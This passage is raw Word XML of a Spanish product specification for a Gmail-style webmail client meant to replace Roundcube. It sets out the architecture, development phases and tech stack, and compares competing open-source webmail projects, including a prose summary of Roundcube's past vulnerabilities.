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Webmail 6.0 ��� Documento Funcional y Arquitectura T��cnica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agent Swarm Research &amp; Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Date"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Junio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5" w:name="Xfa42e877f60a7eca50778511720261f6836c4ac"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webmail 6.0 — Documento Funcional y Arquitectura Técnica</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="resumen-ejecutivo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Resumen Ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="propósito-del-documento"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Propósito del Documento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este documento constituye la especificación funcional y técnica completa para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Webmail 6.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, un cliente de correo web moderno diseñado para reemplazar de forma transparente a Roundcube en entornos de hosting y auto-alojados. El documento integra investigación de mercado, arquitectura de sistema, modelos de datos, diseño de interfaz, estrategias de seguridad, planes de implementación paso a paso, testing y CI/CD — todo lo necesario para que un equipo de desarrollo o un agente swarm pueda construir el producto completo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La audiencia principal son arquitectos de software, equipos de desarrollo full-stack, y agentes de IA encargados de implementar sistemas de email. El documento asume familiaridad con TypeScript, Vue.js, Node.js, MongoDB y protocolos de email (IMAP/SMTP), pero proporciona contexto suficiente para que equipos multidisciplinarios puedan alinearse sobre decisiones técnicas críticas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="visión-de-webmail-6.0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Visión de Webmail 6.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webmail 6.0 nace de una constatación: los clientes de correo web open source existentes en 2026 son, en su mayoría, soluciones diseñadas hace más de una década con arquitecturas que no satisfacen las expectativas modernas de rendimiento, seguridad y experiencia de usuario. Roundcube, el líder indiscutible por número de despliegues (7.100+ estrellas en GitHub, miles de proveedores de hosting), acumuló 15+ CVEs solo en el primer semestre de 2026, incluyendo vulnerabilidades XSS explotadas activamente por grupos vinculados a estados-nación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[55]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[56]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. SnappyMail ofrece mejor rendimiento (99% Lighthouse) pero con un riesgo de mantenimiento crítico (bus factor de aproximadamente 1, gap de 8 meses sin commits)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[98]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[127]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ninguna solución existente combina una interfaz tipo Gmail, un stack TypeScript moderno, soporte dual IMAP/JMAP, calendario integrado y despliegue simple con Docker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La filosofía arquitectónica de Webmail 6.0 se resume en tres principios:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Headers primero, body bajo demanda.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El servidor IMAP sigue siendo la fuente de verdad. MongoDB actúa exclusivamente como caché de metadatos e índice de búsqueda local. Solo los headers se indexan en MongoDB; el cuerpo completo de los emails se recupera de IMAP solo cuando el usuario lo abre, se sanitiza con DOMPurify en el servidor, y se cachea en Redis por una hora. Esta estrategia reduce drásticamente el ancho de banda y permite que un inbox con decenas de miles de emails cargue en menos de un segundo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Seguridad como prioridad arquitectónica, no como parche.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La historia de vulnerabilidades de Roundcube demuestra que la sanitización HTML no puede ser un afterthought. Webmail 6.0 implementa una defensa en capas: DOMPurify server-side antes de cualquier renderizado, Content Security Policy estricto con nonces, sandboxed iframes para preview de HTML, encriptación AES-256-GCM de credenciales IMAP en reposo, y autenticación BFF con tokens de acceso de 15 minutos en memoria y refresh tokens en cookies HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[44]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[69]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dual protocolo: IMAP para compatibilidad, JMAP para el futuro.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">IMAP sigue siendo el protocolo universalmente soportado, pero JMAP (RFC 8620) ofrece sincronización 3-5x más rápida, 80-90% menos ancho de banda y push nativo vía WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[31]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Webmail 6.0 abstrae ambos protocolos bajo una API interna unificada, permitiendo que los usuarios con servidores modernos (Stalwart, Cyrus, Fastmail) se beneficien de JMAP mientras los usuarios con servidores tradicionales (Dovecot, Exchange, cPanel) continúan usando IMAP sin fricción.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="alcance-y-fases"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 Alcance y Fases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El desarrollo se organiza en tres fases secuenciales de aproximadamente 16 semanas en total:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 1 — MVP (Semanas 1-7):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Autenticación multi-cuenta IMAP/SMTP con JWT, sincronización de headers, inbox con vista de tres paneles tipo Gmail, compositor con auto-save de borradores cada 10 segundos, adjuntos con upload/descarga/preview (imágenes/PDF), HTML sanitizado con modo texto plano, contactos básicos, búsqueda local sobre MongoDB, calendario CalDAV con integración de invitaciones .ics, y stack Docker Compose funcional para desarrollo y producción.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 2 — Polish (Semanas 8-11):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Threading de conversaciones con algoritmo JWZ, búsqueda avanzada con MongoDB Atlas Search (fuzzy, autocomplete, filtros por fecha), keyboard shortcuts estilo Gmail, dark mode completo con Tailwind CSS, drag-and-drop de emails entre carpetas, firmas configurables por cuenta, y notificaciones push en tiempo real vía WebSocket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 3 — Enterprise (Semanas 12-16):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Calendario CalDAV completo con RRULE, filtros/rules automáticos de email, soporte PGP/SMIME, panel de administración, métricas y monitoreo con Prometheus/Grafana, y soporte multi-lenguaje.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuera del alcance de la Fase 1: videollamadas, WebOS, sistema de plugins extensible, y PGP nativo (aunque la arquitectura debe permitir su adición en Fase 3 sin refactorización mayor).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El stack tecnológico seleccionado — Vue 3.4 + TypeScript 5 + Fastify 4 + MongoDB 7 + Redis 7 + imapflow — representa un equilibrio óptimo entre madurez, rendimiento y facilidad de despliegue. Fastify procesa ~14.460 req/s comparado con ~6.150 de Express</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. imapflow es la única librería IMAP moderna y activamente mantenida para Node.js, con soporte nativo para TypeScript, CONDSTORE, QRESYNC, IDLE y OAuth2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. MongoDB Atlas Search elimina la necesidad de un cluster Elasticsearch separado para el 90% de los casos de búsqueda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[132]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El documento que sigue detalla cada una de estas decisiones con el rigor técnico necesario para que un agente swarm pueda ejecutar la implementación completa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="36" w:name="Xb7b6d4b8729eac02d3d74d53cfaa33b333d7072"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Investigación Comparativa y Justificación</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28" w:name="estado-del-arte-webmail-open-source-2026"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Estado del Arte: Webmail Open Source 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El ecosistema de webmail open source atraviesa en 2026 un momento de inflexión definido por tres fuerzas simultáneas: la consolidación corporativa alrededor de Roundcube tras su adquisición por Nextcloud en noviembre de 2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[310]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, la emergencia de JMAP como protocolo de nueva generación con adopción creciente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[84]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, y el abandono progresivo de proyectos históricos como RainLoop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[85]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El análisis que sigue examina los cuatro actores principales que configuran el panorama competitivo directo de Webmail 6.0.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="Xe1b48e2f22a850d3add02d2027491e8a139dc69"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1.1 Roundcube: dominante pero con problemas estructurales de seguridad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Roundcube mantiene su posición como el webmail auto-hospedado más desplegado a nivel mundial, con 7.100+ estrellas en GitHub, 1.800 forks, 13.681 commits y 294 contribuyentes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[126]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La adquisición por Nextcloud generó expectativas de aceleración en el desarrollo: la empresa anunció que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invertiría en Roundcube, aceleraría el desarrollo y trabajaría con su comunidad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[310]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La versión 1.7.0, liberada el 10 de mayo de 2026 tras</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">casi cuatro años de desarrollo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, introdujo cambios rupturistas —eliminación de PHP &lt;8.1, soporte IE, y los motores MS SQL/Oracle— junto con mejoras en OAuth2/OIDC y renderizado Markdown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[108]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[113]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sin embargo, el dominio de Roundcube en despliegues no se traduce en excelencia técnica. El primer semestre de 2026 registró más de 15 CVEs, muchos de ellos variantes de XSS persistente. CVE-2026-35539 (CVSS 6.1) permitió XSS a través de una sanitización insuficiente de adjuntos HTML en modo preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[57]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[81]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[338]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. CVE-2026-48842 (SQL injection, CVSS 8.1), CVE-2026-48844 (code injection, CVSS 7.5) y CVE-2026-48848 (CSS injection vía SVG, CVSS 7.2) completan un panorama alarmante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[56]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[340]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un análisis de SonarSource de 2024 calificó este patrón como endémico:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una vulnerabilidad crítica de cross-site scripting en Roundcube permite a atacantes ejecutar JavaScript malicioso en el navegador de la víctima simplemente enviándole un email manipulado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[68]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El problema es estructural. La arquitectura de sanitización HTML de Roundcube, construida sobre una base PHP de más de quince años, no puede garantizar la seguridad frente a vectores de ataque modernos que explotan CSS injection, SVG malformado y HTML5 parsing ambiguo. La skin Elastic, introducida en 2020, sigue recibiendo quejas de usuarios por ser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">difícil de leer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, carecer de personalización de columnas y desperdiciar espacio con el layout de tres paneles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[40]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[96]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A pesar de los recursos de Nextcloud, Roundcube acumula deuda técnica y deuda de seguridad que un webmail de nueva generación puede explotar como ventaja competitiva.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="X51832627f3658c1dd42e900e6d3cb501201f156"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1.2 SnappyMail: alternativa rápida pero con riesgo de mantenimiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SnappyMail, fork de RainLoop, se posiciona como la alternativa moderna más recomendada a Roundcube</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[62]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sus métricas de rendimiento son excepcionales: inicio móvil con ~138 KB de descarga (usando Brotli) y hasta un 99% de calificación de rendimiento en Lighthouse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[67]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[91]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un análisis comparativo directo señala que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SnappyMail renderiza email significativamente más rápido que Roundcube, usa menos RAM, y tiene una UI más limpia. El cifrado PGP está integrado sin necesidad de plugins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[62]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Con 1.600 estrellas en GitHub y 7.184 commits, representa la opción lightweight del mercado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[127]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El riesgo de SnappyMail no es técnico sino de gobernanza. La última release etiquetada es v2.38.2 del 9 de octubre de 2024, y no hubo commits durante el primer trimestre de 2025, lo que provocó un issue de GitHub (#1911) titulado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">¿Está el proyecto muerto?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[98]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aunque el mantenedor respondió negativamente y los commits se reanudaron en marzo de 2026, el lapso de ocho meses sin actividad visible, combinado con 150 issues abiertos y 28 pull requests pendientes, eleva la preocupación por el bus factor del proyecto —esencialmente, un único mantenedor (the-djmaze)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[127]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. En contraste con los 92 contribuyentes de Cypht, la sostenibilidad a largo plazo de SnappyMail permanece incierta.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="X1ba1f2f22ce38a91cbf37a654d5d694fe450b6a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1.3 Cypht: innovador con JMAP nativo pero UI limitada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cypht representa el contendiente técnicamente más innovador del panorama actual. Es el único cliente webmail open source activamente mantenido con soporte nativo JMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[84]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El proyecto opera bajo una gobernanza comunitaria robusta: 1.600 estrellas, 217 forks, 7.423 commits y 92 contribuyentes, con la versión v2.10.1 liberada el 17 de junio de 2026 y commits activos hasta 16 horas antes del momento de investigación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[244]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Desde agosto de 2025, Cypht superó a SnappyMail como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">el proyecto más activo de los últimos 12 meses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en volumen de commits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[71]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La fortaleza de Cypht radica en su versatilidad protocolar: soporta simultáneamente JMAP, IMAP, SMTP, POP3 y EWS, funcionando como un agregador de cuentas heterogéneas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[244]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Su modelo de inbox combinado, que permite ver correos de múltiples proveedores en una sola vista, es funcionalmente superior al enfoque de cuenta única de Roundcube. No obstante, Cypht arrastra una limitación significativa en experiencia de usuario: un usuario del foro Cloudron lo describió como algo que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parece salido de Bootstrap 1.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, en contraste con las expectativas visuales de 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aunque el proyecto ha mejorado su UI de manera constante, la brecha estética y de usabilidad frente a clientes comerciales como Gmail sigue siendo considerable.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="X381efd0365552abb2567fc07f03b7d9951498f9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1.4 Bulwark: next-gen TypeScript/JMAP pero acoplado a Stalwart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bulwark encarna la aproximación de próxima generación: construido desde cero en TypeScript con Next.js 16 y Tailwind CSS v4, habla JMAP nativamente con Stalwart Mail Server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[92]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[337]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Incluye correo, calendario, contactos y archivos en una única aplicación, con asistente de configuración web, soporte OAuth2/OIDC SSO, PWA y temas oscuro/claro. Su organización de GitHub (bulwarkmail) muestra releases activas hasta junio de 2026, con la versión 1.6.4 como la más reciente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[337]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El problema de Bulwark es de alcance: funciona exclusivamente con servidores JMAP (principalmente Stalwart), requiriendo o bien un despliegue Stalwart o su proxy legacy IMAP/SMTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[92]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esta dependencia crea un acoplamiento de stack que limita su adopción universal. Si bien representa la vanguardia de la transición tecnológica —de PHP a TypeScript, de IMAP a JMAP—, su utilidad como reemplazo directo de Roundcube depende de la adopción previa de Stalwart Mail Server, un servidor de correo que, aunque production-ready y financiado por NLnet/Comisión Europea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[105]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[103]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, aún no ha alcanzado la penetración de Dovecot o Cyrus en el mercado de hosting providers.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
